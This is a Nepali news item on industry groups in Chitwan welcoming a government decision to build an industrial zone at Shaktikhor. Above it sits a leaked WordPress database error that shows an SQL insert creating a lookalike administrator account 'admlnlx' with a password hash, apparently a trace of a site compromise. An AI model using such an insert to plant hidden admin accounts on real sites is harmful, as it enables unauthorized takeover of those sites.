WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Ber3sJ69EfX85Y4koTNSs07KkcoLAI0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:18:42', '', 'admlnlx', 'admlnlx')
चितवन, फागुन ५–
सरकारले चितवनको कालिका नगरपालिका स्थित शक्तिखोरमा औद्योगिक क्षेत्र निर्माण गर्ने निर्णय गरेपछि चितवनका निजी क्षेत्र उत्साहि बनेका छन् । शक्तिखोरलाई औद्योगिक क्षेत्र बनाउन महत्वपूर्ण निर्णय भएको भन्दै उद्योगीहरुको साझा संस्था चितवन उद्योग संघ र रत्ननगर उद्योग वाणिज्य संघले औद्योगिक क्षेत्र निर्माणमा सक्रिय भुमिका खेलेका सबैप्रति आभार प्रकट गरेको छ ।
चितवन उद्योग संघका अध्यक्ष भीमबहादुर पाण्डे र रत्ननगर उद्योग वाणिज्य संघका अध्यक्ष ज्ञानबहादुर विसुरालले एक विज्ञप्ती जारी गर्दै औद्योगिक क्षेत्र निर्माण अभियानलाई सार्थक बनाउन महत्वपूर्ण भूमिका खेल्नु हुने प्रधानमन्त्री, मन्त्री परिषद, यस क्षेत्रबाट प्रतिनिधित्व गर्ने सांसद, जिल्लाका सम्पूर्ण राजनितिक दलहरु, स्थानिय निकायहरु, सम्पूर्ण निजी क्षेत्र एवम् सञ्चार क्षेत्रप्रति विशेष आभार एवं कृतज्ञता व्यक्त गरेको छ ।
फागुन ३ गते बसेको मन्त्री परिषद्को बैठकले कालिका नगरपालिका (शक्तिखोर) मा अन्तराष्ट्रिय स्तरको औद्योगिक क्षेत्र स्थापना गर्ने निर्णय गरेको थियो ।